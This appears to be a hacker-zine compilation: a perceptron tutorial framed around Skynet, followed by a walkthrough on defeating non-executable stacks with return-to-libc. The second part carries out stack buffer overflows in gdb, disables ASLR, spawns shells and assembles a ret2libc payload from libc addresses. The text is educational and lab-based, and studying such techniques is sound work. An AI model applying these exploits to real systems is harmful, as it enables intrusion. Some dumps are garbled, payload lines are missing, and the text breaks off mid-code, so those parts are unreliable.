Skynet was designed as a system to identify the greatest threat and determine the best course of action for survival. The real question about Skynet is not whether or not it will kill us, but rather how it will know to kill humans. The answer becomes quite simple with an understanding of machine learning. How does this work, and how does Skynet come to the conclusion to kill all humans? Machine learning is an area of Computer Science that describes and implements ways for computers to learn how to recognize and, in a way, "think" about the data that is fed into a learning algorithm. But what makes this possible? To go into this in depth, we need to first look at how the human brain works. At a high level, a symphony of biological, chemical, and electrical events and reactions combines to form what we perceive to be conscious thought. This is a rather simple view of the actual details, so let's take a closer look at one of these biological, chemical, and electrical events.
The following is a simple ASCII art representation of a neuron: \/ Axon /\/< \/ \/ \ / \/ \__| \ _________ __/ \_____\__ / _______ \ / \ \/ >\ | \_________/ / \ \_/ |_____/___< \__/| ___________/ \__ | \ ___| / \__/ /\ / \___/ \ \ /\ / \ \ \ _/\ \ /\ \ / \ \ \ /\ /\ Nucleus Axon Terminal \ \ \ Dendrites From left to right: Dendrites: The inputs that receive electrochemical stimulation Nucleus: The "brain" and control center of the neuron The nucleus determines when the neuron fires and various other functions, but for this article we will only concern ourselves with its control over the firing process. Axon: Transmits electrical signals from the nucleus to the Axon terminals Axon Terminal: Emits electric impulses to be sent to other connecting neurons in the brain It should be noted that this is only a typical neuron, and there are many, many different kinds. Neurons function by accepting chemical inputs, building up an electrical charge, and firing an impulse when it is greater than a precisely defined threshold of the neuron. The event of firing an impulse is known as action potential. This event causes more chemicals to be released and, in effect, starts a chain reaction. This is the basic principle of how the brain performs computation. Now, how is this useful? A simple model of the neuron has to be developed. Lucky for this article, this has already been accomplished by Frank Rosenblatt, and it is called a perceptron. A perceptron is an artificial representation of a neural network and its ability to think and execute tasks. It contains: A set of inputs: X A set of weights: W A threshold function: G A threshold: T Like a neuron, the perceptron will only fire if its threshold is exceeded. The set of inputs, X, for this article will strictly be binary. The set of weights are floating point values 0 < W < 1. 
The threshold function is the summation of the products of the weights and corresponding inputs, such that:

    _N_   _M_
    \     \
    /__   /__   Wij * Xij
    i=0   j=0

So, these pieces come together to form our perceptron. It can receive |X| inputs and, upon putting these inputs through the threshold function, it will either fire (returning a 1) or not fire (returning a 0). Now, to make this useful, a few technicalities need to be covered. The first is that this model of the neuron, the perceptron, can have its weights changed but not its threshold. Since we cannot directly change the threshold of the perceptron, we must add another input called the bias input. The bias input is a trick that allows the perceptron to change its own threshold. This is done by fixing its value to -1. Doing so in effect makes the threshold of our perceptron a 0, but the effective threshold can still fluctuate through the bias input's weight. This fluctuation allows the perceptron to find the optimal firing threshold. Shown below is the summation of the weights and inputs, including the bias input. The bias input is typically the first input, but this is not required and is just convention.

-1 * W00 + X10 * W10 + X20 * W20 ... Xi0 * Wi0 = y0
-1 * W01 + X11 * W11 + X21 * W21 ... Xi1 * Wi1 = y1
.
.
.
-1 * W0j + X1j * W1j + X2j * W2j ... Xij * Wij = yj

So, what does this mean? Now that the bias node has been added to the inputs, it has effectively changed our threshold value to 0 and provided the ability to change the threshold of the perceptron through manipulation of the weights. This makes the learning ability of the perceptron much stronger. Let's now cover the manual way of setting up a perceptron to learn some action or result. The basic logic operators are quite simple - they require two inputs and produce a single output, which can model whether the perceptron fires or not. Let's first look at OR.
Truth table:

_X1_|_X2_|_Y1_
  0 |  0 |  0
  1 |  0 |  1
  0 |  1 |  1
  1 |  1 |  1

The truth table shows us the inputs that our perceptron will receive (X1 and X2) and the expected output (Y1). Now, let's figure out how to make the perceptron learn this logical function. First, we need to figure out what its weights will be. This is simple; they will start out as random numbers, such that -1.0 < Wij < 1.0. They can be one of infinite possibilities. As the neuron learns, the weights will change to simulate how a neuron learns. A neuron learns through a process of trial and error, with the correct chemical balances producing the correct firing threshold. The neuron in our context does the same through changing its weights. If the sum of the products of the weights and inputs doesn't cause the neuron to fire when it was supposed to, then the weights must be changed so that the neuron fires the next time it sees this input. Now, if the neuron is constantly changing the weights to reflect when it was supposed to fire and not supposed to fire, then the neuron can be said to be unstable. Thus, we must introduce a mechanism to reduce the amount of instability in the neuron. This will be discussed further on. But, as it stands, the neuron will never learn the entire problem. It will only learn a few of the inputs and expected outputs at a time and never completely generalize a solution. How can this be solved? The neuron simply "slows down" its ability to learn by changing the amount by which the weights are allowed to change. This is represented by N, the learning rate (it has a fancy Greek name, eta, but learning rate is more specific). It seems that we have strayed further away from getting our neuron to learn the simple logical operation OR, but all of this is needed. Back to the learning and weight changing. To get the new weight, we need to think of how this new weight will be found.
If the weights can be seen as a function, then to find how to change them we need the derivative of this function. The real derivation is quite annoying, so here is a simplified version that will suit the needs of the perceptron:

dWij = ( Tk - Yk ) Xi

The change of the weights, W, can be seen as a function of the target outputs, Tk, the real outputs, Yk, and the input, Xi, such that the new weight, Wij, will change in relation to the difference of the targets and outputs multiplied by the inputs. But, this raises the earlier problem of stability. In this manner the neuron will instantly learn the current inputs and will ultimately forget any prior learning. Thus, we must slow down its learning speed. This is accomplished through the use of a learning rate, or eta, N. This will effectively act as a mechanism to remember old inputs. It does so by only taking a portion of the change needed to fix the neuron for the current inputs rather than the full required amount. On a side note, it has been found that an N value satisfying 0.1 < N < 0.4 is more than sufficient, and bigger or smaller values lead to instability. With that being said, we have arrived at the following formula:

Wij = Wij + N( Tk - Yk )Xi

With this, we can finally begin to learn our logical operation OR. The first step is to choose the weights for our inputs, minding that there are in fact three weights that need to be picked out. We will use a learning rate of N = 0.25.

W0 = -0.05, W1 = -0.02, W2 = 0.02

For the inputs, we will use the above truth table conveniently reproduced below:

Truth table:

_X1_|_X2_|_Y1_
  0 |  0 |  0
  1 |  0 |  1
  0 |  1 |  1
  1 |  1 |  1

Let's start slugging through some numbers:

X1 = 0 and X2 = 0
Y1: -1 * -0.05 + 0 * -0.02 + 0 * 0.02 = 0.05

The neuron fired when it shouldn't have, so the weights need to be modified.

W0 = W0 + N ( 0 - 1 ) * -1 = -0.05 + 0.25 = 0.20
W1 = W1 + N ( 0 - 1 ) *  0 = -0.02 (unchanged)
W2 = W2 + N ( 0 - 1 ) *  0 =  0.02 (unchanged)

Ok, after fixing the weights for this input, we need to test the next input.

X1 = 1 and X2 = 0
Y1: -1 * 0.20 + 1 * -0.02 + 0 * 0.02 = -0.22

This time the neuron failed to fire when it was supposed to, so the weights must move the other way:

W0 =  0.20 + N ( 1 - 0 ) * -1 = -0.05
W1 = -0.02 + N ( 1 - 0 ) *  1 =  0.23
W2 =  0.02 + N ( 1 - 0 ) *  0 =  0.02 (unchanged)

X1 = 0 and X2 = 1
Y1: -1 * -0.05 + 0 * 0.23 + 1 * 0.02 = 0.07

The neuron fired when it should have, so the weights do not need to be adjusted.

X1 = 1 and X2 = 1
Y1: -1 * -0.05 + 1 * 0.23 + 1 * 0.02 = 0.30

Again, this neuron fired when it should have, so no weight changes are needed. Now, the process is complete... for this iteration. We have to continue doing this until the network stabilizes, and this happens when all the outputs are equal to the targets and the weights stop moving around. This will take 4-5 iterations for this particular example. Eventually, the weights will settle down and the perceptron will have learned this function. But, how does this work, exactly? It works by dividing the set of solutions into two groups, such that if we graph it we can draw a line between the points.

*'s mean the perceptron fired.
+'s mean the perceptron did not fire.

1|*           *
 |
 |
 |
 |
 |+___________*
 0            1

Looking at this graph, it is easy to see that there is a line that divides the points, making it look like the following:

1|*           *
 |\
 | \
 |  \
 |+__\________*
 0    \       1

As the graph shows, the line divides them with all the *'s on one side and all the +'s on the other. Now, where did this line come from? It came from the weights, which in this example are the coefficients of the line function:

aX + bY = C

There is a lengthy process to prove this through a few vector calculations using the inner product of two vectors, but the basic idea is that there exists a line, plane, or hyperplane through the set of points that separates the points into two distinct sets. Planes and hyperplanes? Yes, these are the solutions for when there are more than two inputs into the perceptron. An example is found at the end of the article.
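The whole learning procedure above fits in a few lines of code. Below is a minimal sketch of mine in Python (rather than the article's JavaScript) of a single perceptron with a fixed -1 bias input learning OR via the update rule Wij = Wij + N( Tk - Yk )Xi; the function names are my own:

```python
def train_perceptron(inputs, targets, eta=0.25, iterations=10):
    # One weight for the fixed -1 bias input, plus one per real input.
    weights = [0.0] * (len(inputs[0]) + 1)
    for _ in range(iterations):
        for x, t in zip(inputs, targets):
            xs = [-1] + list(x)          # prepend the bias input
            y = 1 if sum(w * xi for w, xi in zip(weights, xs)) > 0 else 0
            # Wij = Wij + N( Tk - Yk )Xi
            weights = [w + eta * (t - y) * xi for w, xi in zip(weights, xs)]
    return weights

def fire(weights, x):
    # Fire (1) if the weighted sum, bias included, exceeds the 0 threshold.
    xs = [-1] + list(x)
    return 1 if sum(w * xi for w, xi in zip(weights, xs)) > 0 else 0

w = train_perceptron([(0, 0), (1, 0), (0, 1), (1, 1)], [0, 1, 1, 1])
print([fire(w, x) for x in [(0, 0), (1, 0), (0, 1), (1, 1)]])   # [0, 1, 1, 1]
```

Starting from zero weights instead of small random ones keeps the run deterministic; the loop stabilizes within a handful of iterations, just as in the worked example.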
So, a problem that can be solved by a perceptron has to have the following properties:

1: Linearly separable via a line, plane, or hyperplane.
2: Answerable by firing or not firing - essentially a yes or no question.
3: Grouped into distinct classes.

Let's look at the following example of something that is not linearly separable by a line.

Logical function XOR:

_X1_|_X2_|_Y1_
  0 |  0 |  0
  1 |  0 |  1
  0 |  1 |  1
  1 |  1 |  0

The graph of XOR:

1|*           +
 |
 |
 |
 |
 |+___________*
 0            1

Looking at the truth table doesn't shed any light on whether this is linearly separable or not, but looking at the graph shows that there is no line such that the +'s and *'s are in separate partitions. Thus, XOR cannot be solved like we did OR; it must be put into a higher dimension. We will use 3D to do that. We will add another bit of information to separate the two groups, *'s and +'s, so that our perceptron can solve it. Let's look over at the JavaScript and HTML page to help do this for us. When first loading this page, it will have the defaults for the OR function we worked out earlier. On this page, the number of Iterations and the Learning Rate may be changed, and these various options can be tested by pressing the "start" button. But, what we want to focus on is in the Code text area. The default looks like the following:

var inputs = [ [ 0, 0 ],
               [ 0, 1 ],
               [ 1, 0 ],
               [ 1, 1 ] ];
var targets = [ 0, 1, 1, 1 ];
var dimensions = 2;

Notice that they are arrays and 'inputs' is a 2D array. The length of 'inputs' must be equal to that of 'targets', and 'dimensions' must be equal to the length of each sub-array of 'inputs'. This is so that the code can make the weights vector correctly. Now, we need to make a change to the code section so that we can get our perceptron to learn the XOR logical operation.

var inputs = [ [ 0, 0, 1 ],
               [ 0, 1, 0 ],
               [ 1, 0, 0 ],
               [ 1, 1, 0 ] ];

First, we need to change the inputs to be in a 3D space.
We have lifted up the first input so that it will not be in the same plane as the other inputs. This single change is all that is needed to make the XOR learnable. The targets vector is changed to the following: var targets = [ 0, 1, 1, 0 ]; This is to reflect how the XOR operation works. And, finally the number of dimensions needs to be changed to 3. var dimensions = 3; Now, change the number of iterations to 30, leave the Learning Rate at the default 0.25, and click start. The perceptron should be able to solve the problem. If it did not, hit start again and scroll through the output textarea to see if it has solved it. In the 'weights' textarea are the various weight values that are used during the learning process. An exercise would be to look at the weights as the perceptron tries to learn the XOR using a 2D input matrix. The graph for this looks like the following: (0,0,1)|+ | | | (0,0,0)|__________________*(0,1,0) / / / / (1,0,0)*/ +(1,1,0) It's somewhat difficult to reproduce a 3d plane in ASCII, so just imagine one going through the +'s and *'s. The same idea before applies here; the perceptron is looking to solve the equation of the plane that separates the two sets. This can be expanded further, but even ASCII lacks the ability to draw in 4D. So, how is this a process of learning? The process detailed above is a process of a single perceptron, neuron, to learn how to solve a linearly separable set of points. It has gained the ability to generalize a solution to a simple problem and is able to accurately give an answer to all of its inputs. But, we have simply given it all of the possible outcomes and trained our perceptron on the actual data. In practice, this is not possible. What happens now is that to learn against bigger sets of data, a process of training must be developed. The proper way to train a perceptron or a neural network in an assisted manner is to feed it half of the data then check against the other half of the data. 
Using the perceptron that is in the JavaScript, we can do just that using the provided data. Let's look at the following data collected from the Pima Indians dataset:

var inputs = [
[4,110,92,0,0,37.6,0.191,30,0],
[10,168,74,0,0,38.0,0.537,34,1],
[10,139,80,0,0,27.1,1.441,57,0],
[1,189,60,23,846,30.1,0.398,59,1],
[5,166,72,19,175,25.8,0.587,51,1],
[7,100,0,0,0,30.0,0.484,32,1],
[0,118,84,47,230,45.8,0.551,31,1],
[7,107,74,0,0,29.6,0.254,31,1],
[1,103,30,38,83,43.3,0.183,33,0],
[1,115,70,30,96,34.6,0.529,32,1],
[3,126,88,41,235,39.3,0.704,27,0],
[8,99,84,0,0,35.4,0.388,50,0],
[7,196,90,0,0,39.8,0.451,41,1],
[9,119,80,35,0,29.0,0.263,29,1],
[11,143,94,33,146,36.6,0.254,51,1],
[10,125,70,26,115,31.1,0.205,41,1],
[7,147,76,0,0,39.4,0.257,43,1],
[1,97,66,15,140,23.2,0.487,22,0],
[13,145,82,19,110,22.2,0.245,57,0],
[5,117,92,0,0,34.1,0.337,38,0],
[5,109,75,26,0,36.0,0.546,60,0],
[3,158,76,36,245,31.6,0.851,28,1],
[3,88,58,11,54,24.8,0.267,22,0],
[6,92,92,0,0,19.9,0.188,28,0],
[10,122,78,31,0,27.6,0.512,45,0],
[4,103,60,33,192,24.0,0.966,33,0],
[11,138,76,0,0,33.2,0.420,35,0],
[9,102,76,37,0,32.9,0.665,46,1],
[2,90,68,42,0,38.2,0.503,27,1],
[4,111,72,47,207,37.1,1.390,56,1],
[3,180,64,25,70,34.0,0.271,26,0],
[7,133,84,0,0,40.2,0.696,37,0],
[7,106,92,18,0,22.7,0.235,48,0],
[9,171,110,24,240,45.4,0.721,54,1],
[7,159,64,0,0,27.4,0.294,40,0],
[0,180,66,39,0,42.0,1.893,25,1],
[1,146,56,0,0,29.7,0.564,29,0]
];
var targets = [];
for( var i = 0; i < inputs.length; i++ )
{
    targets.push( inputs[i].pop() );
}
var dimensions = 9;

This dataset represents a subset of the Pima Indian population and whether each individual has diabetes (the last column, which is popped off and put into 'targets'). If this code is placed into the code textarea, the accuracy of the perceptron at correctly telling whether someone has diabetes is almost non-existent. Unlike the above examples, this data set cannot be graphed and is a good example of real world data.
From this, you cannot train on all of the data, but rather you must train on a subset of the data and then perform a check on the rest of the data, thus more accurately gauging the perceptron's ability to learn and generalize its solution. How do we do the training on the subset of the data? On the HTML page, there is a check box that, when checked, will simply split the data in half, train on one half of the data, and test with the other half. This is quite useful and can gauge how well the perceptron is able to generalize its solution to the set of data that has been presented. This method can help verify how well the perceptron has learned something. Another method to help improve the learning ability of the perceptron is to normalize the data or, in essence, take out the data's variance, which will allow the perceptron to more easily learn the problem. You, the reader, have been hoping all this time to learn the answer to the initial question of this article - how does Skynet work? However, all you got instead was some garbled math and a web page. But, the principle behind this method is how Skynet could learn, classify dangerous enemies, and ultimately kill all humans. Some other applications for this perceptron and neural networks are:

- OCR to break captchas.
- Giving a user recommended items.
- Predicting future events based on past ones.
- Fitting a line, plane, or hyperplane to a set of data.
- Many more.

Enjoy,
Elchupathingy

[==================================================================================================]

-=[ 0x06 Defeating NX/DEP With return-to-libc and ROP
-=[ Author: storm
-=[ Website:

Table of Contents

I.    Introduction
II.   Background
III.  The Problem
IV.   Return-to-libc
V.    Return-to-PLT
VI.   Return-to-PLT + GOT Overwrite
VII.  Return-to-libc by neg ROP
VIII. References and Further Reading

I.
Introduction
===============

The return-to-libc attack, commonly abbreviated as ret2libc, is a method of exploiting memory corruption vulnerabilities on systems with non-executable (NX) stacks. First publicly discussed by the security researcher Solar Designer in the late 90s, ret2libc attacks are still relevant in the modern realm of exploitation, but have mostly made way for Return-Oriented Programming (ROP), which is a generalization of the ret2libc technique. It should be noted that all technical examples in this paper were performed on a Fedora Core 14 machine. While many of these techniques are universal, some OSes may employ certain memory protections by default that break the examples. For instance, stack canaries are enabled by default on Ubuntu systems and should be disabled with the gcc -fno-stack-protector flag at compile-time.

II. Background
==============

Before proceeding, the reader should be familiar with traditional stack-based buffer overflows. For the sake of comprehension, a short review will be provided. It should be noted that in this simple example, memory protections such as DEP, ASLR, and stack canaries are disabled. Given the following source code (from):

#include <string.h>

void foo (char *bar)
{
    char c[12];
    strcpy(c, bar);  // no bounds checking...
}

int main (int argc, char **argv)
{
    foo(argv[1]);
}

We can see that argv[1] is passed as an argument to the function foo(). A buffer of 12 bytes is allocated and given the name 'c'. A call to strcpy() copies the string from the buffer 'bar' (formerly argv[1]) into 'c'. The problem lies within the fact that no bounds check is performed on the buffer 'bar' before it is copied into 'c', allowing any string greater than 12 bytes long (trailing null byte included) to be written past the 12 bytes allocated. By allowing this, we have the potential to overwrite data on the stack critical to the program's behavior.
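Before stepping through gdb, the mechanics can be modeled in a few lines of Python. This is a toy model of mine, not part of the original paper: the frame layout (the 12-byte buffer 'c' padded to 20 bytes of locals, then the saved frame pointer, then the return address) and the two pointer values match what the gdb session below will reveal:

```python
# Toy model of foo()'s stack frame as a flat byte array.
frame = bytearray(b"\x00" * 20)               # buffer 'c' + other locals/padding
frame += (0xbfffefc8).to_bytes(4, "little")   # saved %ebp (value from the dump)
frame += (0x080483f7).to_bytes(4, "little")   # return address back into main()

def unsafe_strcpy(dest, src):
    # No bounds check, just like strcpy(c, bar).
    dest[:len(src)] = src

# 24 bytes of filler reach the return address; 4 more replace it.
unsafe_strcpy(frame, b"A" * 24 + (0xdeadbeef).to_bytes(4, "little"))

ret = int.from_bytes(frame[24:28], "little")
print(hex(ret))   # 0xdeadbeef -- the saved %eip is now ours
```

The 28-byte write here is exactly the overwrite length derived later in the section; everything up to byte 24 is filler, and the final four bytes become the new %eip.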
Specifically, a pointer saved on the stack named the "return address" is of particular interest to us. This pointer is present on the stack due to the way function calls are performed within programs. Let's step our way through foo() in the program above. Here, we set a breakpoint just before the call is initiated: Breakpoint 1, 0x080483f2 in main () (gdb) x/5i $eip => 0x80483f2 <main+20>: call 0x80483c4 <foo> 0x80483f7 <main+25>: leave 0x80483f8 <main+26>: ret 0x80483f9: nop 0x80483fa: nop (gdb) x/16x $esp 0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4 0xbfffefc0: 0x08048400 0x00000000 0xbffff048 0x00212e36 0xbfffefd0: 0x00000002 0xbffff074 0xbffff080 0xb7fff478 0xbfffefe0: 0x00110414 0xffffffff 0x001f8fbc 0x0804822c (gdb) We start off by looking at the state of the stack before the function call. Continuing, let's take this step-by-step. (gdb) si 0x080483c4 in foo () (gdb) x/16x $esp 0xbfffefac: 0x080483f7 0xbffff265 0x08048310 0x0804840b 0xbfffefbc: 0x00381ff4 0x08048400 0x00000000 0xbffff048 0xbfffefcc: 0x00212e36 0x00000002 0xbffff074 0xbffff080 0xbfffefdc: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc For those unfamiliar with gdb, note that the 'si' command is shorthand for 'step instruction', which allows us to walk through the assembly code instruction-by-instruction. We see that by entering foo(), the pointer 0x080483f7 is pushed onto the stack. Looking above, we notice that this is the address of the next instruction within main(). This pointer is the return address and will later be popped back into %eip in the epilogue of foo(). 
Continuing: (gdb) x/10i $eip => 0x80483c4 <foo>: push %ebp ; Push the frame pointer onto the stack 0x80483c5 <foo+1>: mov %esp,%ebp ; Address of saved fp becomes new %ebp 0x80483c7 <foo+3>: sub $0x28,%esp ; Allocate space for local variables 0x80483ca <foo+6>: mov 0x8(%ebp),%eax ; Copy pointer to 'bar' to %eax 0x80483cd <foo+9>: mov %eax,0x4(%esp) ; Set up 'bar' as 2nd arg to strcpy() 0x80483d1 <foo+13>: lea -0x14(%ebp),%eax ; Copy pointer to 'c' to %eax 0x80483d4 <foo+16>: mov %eax,(%esp) ; Set up 'c' as 1st arg to strcpy() 0x80483d7 <foo+19>: call 0x80482f4 <strcpy@plt> ; Perform library call to strcpy() 0x80483dc <foo+24>: leave ; Copy %ebp to %esp, pop fp to %ebp 0x80483dd <foo+25>: ret ; Pop return address to %eip (gdb) By manipulating the return address stored on the stack before the function epilogue, we directly influence the value of %eip, redirecting execution of the program to anywhere we choose. Setting a breakpoint for 0x80483d7, let's look at the stack just before the strcpy() call: Breakpoint 2, 0x080483d7 in foo () (gdb) x/16x $esp 0xbfffef80: 0xbfffef94 0xbffff265 0xbfffef98 0x080482c0 0xbfffef90: 0x00000000 0x08049644 0xbfffefc8 0x08048419 0xbfffefa0: 0xb7fff478 0x00382cc0 0xbfffefc8 0x080483f7 0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4 (gdb) We see that strcpy() is being given two pointers as first and second arguments, a pointer to the buffer 'c', and a pointer to the buffer 'bar', respectively. We also see our saved frame pointer and return address located lower on the stack at 0xbfffefa8 and 0xbfffefac, respectively. By writing 0xbfffefb0 - 0xbfffef94 = 0x1c = 28 bytes to 'c', we have full EIP overwrite and control over the program: (gdb) delete Delete all breakpoints? 
(y or n) y
(gdb) break *0x80483dd
Breakpoint 3 at 0x80483dd
(gdb) run `perl -e'print "A"x28'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28'`

Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>:  ret
(gdb) x/x $esp
0xbfffef8c: 0x41414141
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x080483dd in foo ()
(gdb)

By stashing compiled code on the stack itself, we redirect execution to the location of our "shellcode" and drop a shell:

(gdb) run [shellcode argument lost in transcription; a stack dump follows showing where the payload landed]

We see our shellcode is located at 0xbfffef70, so let's now overwrite the return address with this, ordering the bytes in reverse to account for little endianness:

(gdb) run [payload lost in transcription; the same shellcode string with the return address bytes \x70\xef\xff\xbf appended]
(gdb) c
Continuing.
process 22006 is executing new program: /bin/bash
sh-4.1$

III. The Problem
================

Modern hardware and operating systems support a feature called NX bit/DEP, which flags regions of memory as non-executable. As a security precaution, compilers now mark the stack non-executable to prevent the execution of shellcode in buffer overflow attacks. Thus, overwriting the return address with the address of our shellcode on the stack results in a segfault. To exemplify this point, we can see specifically which regions of memory have what permissions using the following program:

#include <stdio.h>

int main (int argc, char **argv)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    char line[1024];

    while(fgets(line, sizeof(line), fp) != NULL)
    {
        printf("%s", line);
    }

    fclose(fp);
    return 0;
}

By running this program, we print the contents of /proc/self/maps.
We see that by default, our program's stack does not possess +x permissions: [storm@Dysthymia audit]$ ./stacky 001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so 001f8000-001f9000 r--p 0001c000 fd:01 19335 /lib/ld-2.13.so 001f9000-001fa000 rw-p--p 00183000 fd:01 24337 /lib/libc-2.13.so 00382000-00383000 rw-p 00185000 fd:01 24337 /lib/libc-2.13.so 00383000-00386000 rw-p 00000000 00:00 0 00d21000-00d22000 r-xp 00000000 00:00 0 [vdso] 08048000-08049000 r-xp 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky 08049000-0804a000 rw-p 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky 0990b000-0992c000 rw-p 00000000 00:00 0 [heap] b7893000-b7894000 rw-p 00000000 00:00 0 b78ae000-b78b0000 rw-p 00000000 00:00 0 bfcf5000-bfd16000 rw-p 00000000 00:00 0 [stack] [storm@Dysthymia audit]$ We can manually flip the executable stack flag in our program's ELF header, disabling this memory protection for the program: [storm@Dysthymia audit]$ execstack -s ./stacky [storm@Dysthymia audit]$ ./stacky 00110000-0011100034f000-00350000 rwxp 00000000 00:00 0 00350000-004d3000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so 004d3000-004d4000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so 004d4000-004d6000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so 004d6000-004d7000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so 004d7000-004da000 rwxp 00000000 00:00 0 00673000-00674000 r-xp 00000000 00:00 0 [vdso] 009d5000-009d6000 rwxp 00000000 00:00 0 08048000-08049000 r-xp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky 08049000-0804a000 rwxp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky 08adf000-08b00000 rwxp 00000000 00:00 0 [heap] bfa61000-bfa82000 rwxp 00000000 00:00 0 [stack] [storm@Dysthymia audit]$ You may have noticed something odd about the output this program. Comparing the output of the two separate times running the program, we also notice that the addresses of loaded libraries and certain other areas of memory changed. 
This is due to a memory protection technique called Address Space Layout Randomization (ASLR). By randomizing the location of data in a process's address space, exploit writers cannot reliably predict where certain key functions or code are located in memory, turning reliable exploits into improbable gambles. An area of research is devoted to exploiting applications enabled with ASLR, but that is much beyond the scope of this paper. For the sake of taking one step at a time, let's disable ASLR for our examples:

[storm@Dysthymia audit]$ su -
[root@Dysthymia ~]# echo 0 > /proc/sys/kernel/randomize_va_space
[root@Dysthymia ~]# logout
[storm@Dysthymia audit]$

Much better. Getting back to the original problem, the question is, how can an attacker successfully and reliably exploit a simple stack-based buffer overflow when the stack is flagged non-executable? With ret2libc, of course!

IV. Return-to-libc
==================

The premise of ret2libc is actually quite simple. Thinking back to how a standard buffer overflow works, we recognize that our ultimate goal is to return into code that does our evil bidding, most likely dropping a bash prompt or spawning a reverse shell. Knowing that we are unable to provide our own code to return into (thanks to the non-executable stack and heap), we must take a step back and think about our options. Our guidelines are as follows:

- Code must be (obviously) present in the process's address space at the time of exploitation
- Code must be flagged executable
- Code must be located at a predictable address
- Code must perform an action that is beneficial to our goals (spawning a shell)

Where will we ever find code that satisfies all of our needs? Oh, right. libc, the C standard library implementation on Linux. Let's let Wikipedia be our guide:

The C standard library consists of a set of sections of the ANSI C standard in the programming language C.
They describe a collection of headers and library routines used to implement common operations such as input/output and string handling. Unix-like systems typically have a C library in shared library form. - To clarify and expand on the definition, libc is a shared library present on nearly all Linux systems that is, by default, linked against every program compiled with gcc. libc is an implementation of the C standard, providing the code that performs common, rudimentary operations such as printing strings and allocating memory. Every time you make a function call to printf() or malloc() from within a C program, you are most likely running code in libc. Let's go down our checklist. libc is certainly present in the address space of almost every process running on Linux. The code is flagged executable, because it is legitimate code used by the program itself. By disabling ASLR, we are ensuring that the library will be loaded at the same base address every time, allowing us to reliably predict where in memory it will be located. Since libc provides an exceptionally wide array of functions, there is a good chance we can abuse one of them to gain access to the system. Let's start building a template for our exploit: AAAAAAAAAAAAAAAAAAAAAAAA [ libc function ] [ return-to ] [ arg1 ] [ arg2 ] ... ^ ^ | | | | | | overflow ("A"x24) -------------------------------------- Obviously, we want to return into a libc function that lets us execute arbitrary code. A good candidate is system(), although there are a number of methods using different functions. [storm@Dysthymia audit]$ gdb -q ./example Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done. 
(gdb) break main Breakpoint 1 at 0x80483e1 (gdb) run Starting program: /home/storm/Desktop/audit/example Breakpoint 1, 0x080483e1 in main () (gdb) p system $1 = {<text variable, no debug info>} 0x235eb0 <__libc_system> (gdb) Looking at the output of gdb, we see that system() resides in memory at 0x00235eb0, so let's add that to our exploit. AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ arg1 ] [ arg2 ] ... ^ ^ | | | | | | overflow ("A"x24) -------------------------------------- &system Now we need to provide an argument to system(), which is a pointer to a null-terminated string of the command being executed. The simple solution is just to give it a pointer to "/bin/bash", which we can do by either a) writing it into memory after the exploit string itself, or b) re-using an already existing instance of the string in memory. Let's be lazy and choose the latter. (gdb) find $esp, 0xbfffffff, "/bin/bash" 0xbffff310 1 pattern found. (gdb) x/s 0xbffff310 0xbffff310: "/bin/bash" (gdb) x/s 0xbffff30a 0xbffff30a: "SHELL=/bin/bash" (gdb) Conveniently, we can leverage the SHELL environment variable here. Now that we have a pointer to our command string, let's update the exploit. AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ \x10\xf3\xff\xbf ] ^ ^ | | | | overflow ("A"x24) ------------------------------------ &system arg1: "/bin/bash" The return-to pointer actually serves as the return address for our libc function. This by nature isn't necessary to set for the exploit to work, but it's common to return to exit() afterwards to end the process cleanly and prevent any alerts due to a crashed process. These alerts may be viewed by monitoring the tail of /var/log/messages (on most distributions). 
(gdb) p exit
$2 = {void (int)} 0x22ac00 <exit>
(gdb)

For the sake of adding more unnecessary arrows to the diagram, our finished exploit now looks like:

          &exit ----------------------------
          |                                \/
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ \x00\xac\x22\x00 ] [ \x10\xf3\xff\xbf ]
          ^                      ^
          |                      |
 overflow ("A"x24)               ----------------------------------------------
                                 &system                      arg1: "/bin/bash"

Yeah, cool. Too bad it doesn't work.

As you probably noticed, our exploit contains null bytes everywhere. This is a huge problem, since we're using strcpy() to copy our exploit string and it will stop as soon as the first null byte is encountered.

There are actually two factors contributing to having null bytes in this exploit. The first, most prominent factor is a memory protection called ASCII-Armor, which maps important libraries to addresses that contain a null byte. As observed, the addresses of system() and exit(), as well as every other function in libc, started with 0x00.

The second factor is due to there coincidentally being a null byte present elsewhere in the address of exit(). In addition to ASCII-Armor, the least significant byte of the address is also 0x00. This is not an especially huge issue, however, since we can simply jump to an offset of exit() that doesn't alter its actual functionality. Let's take a look:

(gdb) x/10i exit
   0x22ac00 <exit>:     push %ebp
   0x22ac01 <exit+1>:   mov %esp,%ebp
   0x22ac03 <exit+3>:   push %edi
   0x22ac04 <exit+4>:   push %esi
   0x22ac05 <exit+5>:   push %ebx
   0x22ac06 <exit+6>:   call 0x212c6f <__i686.get_pc_thunk.bx>
   0x22ac0b <exit+11>:  add $0x1573e9,%ebx
   0x22ac11 <exit+17>:  sub $0x2c,%esp
   0x22ac14 <exit+20>:  mov 0x8(%ebp),%edi
   0x22ac17 <exit+23>:  mov 0x330(%ebx),%esi
(gdb)

0x0022ac01 looks pretty good. The only instruction we're skipping is push %ebp, which won't matter anyways since exit() doesn't return, thus having no need to unwind the stack.
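A quick way to pre-screen candidate addresses for this problem — a throwaway Python helper, not something from the original exploit:

```python
import struct

def has_null_byte(addr):
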